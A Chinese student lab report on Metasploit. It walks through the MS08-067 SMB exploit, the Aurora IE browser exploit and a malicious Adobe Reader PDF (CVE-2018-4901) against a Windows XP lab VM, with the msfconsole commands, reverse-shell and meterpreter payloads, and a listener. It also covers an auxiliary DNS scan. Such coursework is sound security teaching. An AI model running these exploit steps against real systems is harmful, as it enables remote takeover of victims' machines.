1 实验内容

1.1 实验目标

掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路。

具体需要完成：

1.一个主动攻击实践，尽量使用最新的类似漏洞;

2.一个针对浏览器的攻击，尽量使用最新的类似漏洞；

3.一个针对客户端的攻击，如Adobe或office，尽量使用最新的类似漏洞；

4.成功应用任何一个辅助模块。

1.2 基础知识

1.2.1 什么是metasploit？

Metasploit（The Metasploit Framework），就是一个漏洞框架，是一个免费、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具，目前最流行、最强大、最具扩展性的渗透测试平台软件；默认集成在kali中。

1.2.2 技术架构

• 辅助模块
  Metasploit为渗透测试的信息搜集环节提供了大量的辅助模块支持，包括针对各种网络服务的扫描与查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。辅助模块能够帮助渗透测试者在渗透攻击之前取得目标系统丰富的情报信息。
• 渗透攻击模块
  渗透攻击模块是利用发现的安全漏洞或配置弱点对目标系统进行攻击，以植入和运行攻击载荷，从而获取对远程目标系统访问权的代码组件。

主动渗透攻击所利用的安全漏洞位于网络服务端软件与服务承载的上层应用程序之中，由于这些服务通常是在主机上开启一些监听端口并等待客户端连接，因此针对它们的渗透攻击可以主动发起，通过连接目标系统网络服务，注入一些特殊构造的包含"邪恶"攻击数据的网络请求内容，触发安全漏洞并使得远程服务进程执行在"邪恶"数据中包含攻击奉词，从而获取目标系统的控制会话。
被动渗透攻击利用的漏洞位于客户端软件中，如浏览器、浏览器插件、电子邮件客户端、0ffice与Adobe等各种文档阅读与编辑软件。对于这类存在于客户端软件的安全漏洞，我们无法主动地将数据从远程输入到客户端软件中，因此只能采用被动渗透攻击的方式，即构造出"邪恶"的网页（钓鱼网站等）、电子邮件或文档文件，并通过架设包含此类恶意内容的服务、发送邮件附件、结合社会工程学分发并诱骗目标用户打开、结合网络欺骗和劫持技术等方式，等目标系统上的用户访问到这些邪恶的内容，从而触发客户端软件中的安全漏洞，给出控制目标系统的Shell会话。

• 攻击载荷模块
  攻击载荷是在渗透攻击成功后使目标系统运行的一-段植入代码，通常作用是为渗透攻击者打开在目标系统上的控制会话连接。
• 空指令模块
  空指令(NOP)是一些对程序运行状态不会造成任何实质影响的空操作或者无关操作指令，最典型的空指令就是空操作，在 x86 CPU体系架构平台上的操作码是0x90。
• 编码器模块
  攻击载荷模块与空指令模块组装完成一个指令序列后，在这段指令被渗透攻击模块加入邪恶数据缓冲区交由目标系统运行之前，Metasploit 框架还需要完成一道非常重要的工序----编码。
  编码器模块的第一个使命就是确保攻击载荷中不会出现渗透攻击过程中应加以避免的"坏字符"。编码器的第二个使命就是对攻击载荷进行"免杀"处理。
• 后渗透攻击模块
  后渗透攻击模块主要支持在渗透攻击取得目标系统控制权之后，在受控系统中进行各式各样的后渗透攻击动作，比如获取敏感信息、进一步拓展、 实施跳板攻击等。
• 免杀模块
  对攻击载荷进行"免杀"处理。

2　实验过程

2.1 主动攻击实践：ms08_067

MS08-067漏洞的原理：攻击者利用受害者主机默认开放的SMB服务端口445，发送特殊RPC（Remote Procedure Call，远程过程调用）请求，造成栈缓冲区内存错误，从而被利用实施远程代码执行。

2.1.1 实验环境

kali机ip地址为192.168.10.134
windowsXP机ip地址为192.168.10.135

2.1.2 确认靶机漏洞存在

利用nmap扫描：

nmap -sS -A --script=smb-vuln-ms08-067 -PO ip地址

如图所示，445端口开放。

再如图所示，该漏洞在靶机中确实存在，可以对靶机实施相应攻击。

2.1.3 进行攻击

先进入msfconsole工作台。

msfconsole

查找ms08_067模块，确实存在。再选择这个漏洞。

search ms08_067

use exploit/windows/smb/ms08_067_netapi

 

没问题，设置攻击载荷和靶机IP。

set payload generic/shell_reverse_tcp

set RHOSTS 靶机ip

run一下就开始攻击啦！

成功获取了xp的shell，我们尝试使用，成功！

2.2 针对浏览器的攻击：ms10_002_aurora

极光漏洞（Aurora）是一个针对IE浏览器的重大漏洞,攻击者向目标发送链接，当IE用户使用IE浏览器点击链接时，就会向攻击者反弹一个可利用的shell，同时会严重占用目标机器的CPU，导致机器卡死。

所以针对浏览器的攻击，我使用ms10_002_aurora漏洞

2.2.1 查找漏洞存在

确实存在。

2.2.2 进行攻击

跟上一次一样，使用该漏洞进行攻击，设置好ip和端口即可。

use exploit/windows/browser/ms10_002_aurora

set SRVHOST 攻击机ip

set srvport 端口

exploit

弹出了一个网址。

在靶机上打开这个网址，我们在攻击机上列出会话并进入meterpreter会话，就可以获取shell了。

 

2.3 针对客户端的攻击：CVE-2018-4901

Adobe Reader在处理CoolType字体文件的sing表时，存在栈溢出漏洞，当打开特制的恶意PDF文件时，可允许任意代码远程执行。所以我利用这个漏洞。（参考链接5）

2.3.1 查找漏洞存在

查一下。

2.3.2 开始攻击

进入 Kali Linux，使用 Metasploit 生成 PDF 木马文件。
1.搜索 Adobe 渗透模块

search adobe_cooltype_sing 

2.调用渗透模块

use exploit/windows/fileformat/adobe_cooltype_sing/ 

3.查看模块详情

 info 

4.调用meterpreter载荷，反向连接到渗透机

 set payload windows/meterpreter/reverse_tcp 

5.设置Kali Linux的IP地址

set LHOST 攻击机ip地址

6.设置本地监听端口

 set LPORT 端口

7.设置带有后门程序的PDF文件

set FILENAME 起个名字.pdf

8.执行渗透生成文件

exploit

把这个文件复制出来，放到靶机上。攻击机开启监听。

use exploit/multi/handler
set LPORT 2424 # 与前面使用攻击模块时配置的LPORT要一致
set LHOST 192.168.10.135 # 与前面使用攻击模块时配置的LHOST要一致
run

在靶机上使用Adobe Reader打开pdf文档后，会卡机。此时在攻击机上则会显示监听成功，成功获取目标主机的shell。

2.4 辅助模块应用

查看一下都有哪些辅助模块。

show auxiliary

1200个，其中我选择了scanner/dns/dns_amp模块，用来扫描dns。

成功使用。

3.问题及解决方案

问题1：起初，我用的是中文版WindowsXP系统，但是，445端口明明开放，却显示no session was created。

问题1解决办法：最后，我实在是不知道怎么解决了，我请教了lxl同学，重新下载了英文版的WindowsXP虚拟机，问题就解决了。

问题2：对浏览器攻击时一直显示地址已被占用。

问题2解决办法：查了很多方法都解决不了，后来重装了靶机，换了一下网络就莫名其妙解决了。

4.学习感悟、思考等

本次实验我学习了metasploit的基本使用，运用多种模块，进行多种不同的攻击，还有如何使用辅助模块等，还深入了解了网络安全的重要性和攻击的原理，还是受益匪浅。

参考资料

本次实验中，我参考的资料如下：
1.邢学姐实验报告
2.Metasploit渗透测试，在攻击模块执行exploit时出现远程主机不可达，什么原因？
3.Windows漏洞：MS08-067远程代码执行漏洞复现及深度防御
4.Kali linux-Exploit failed ：Rex:：ConnectionTimeout解决方法
5.“PDF打开即中招”的经典Adobe Reader漏洞复现，红队高级渗透测试必备
6.Metasploit漏洞框架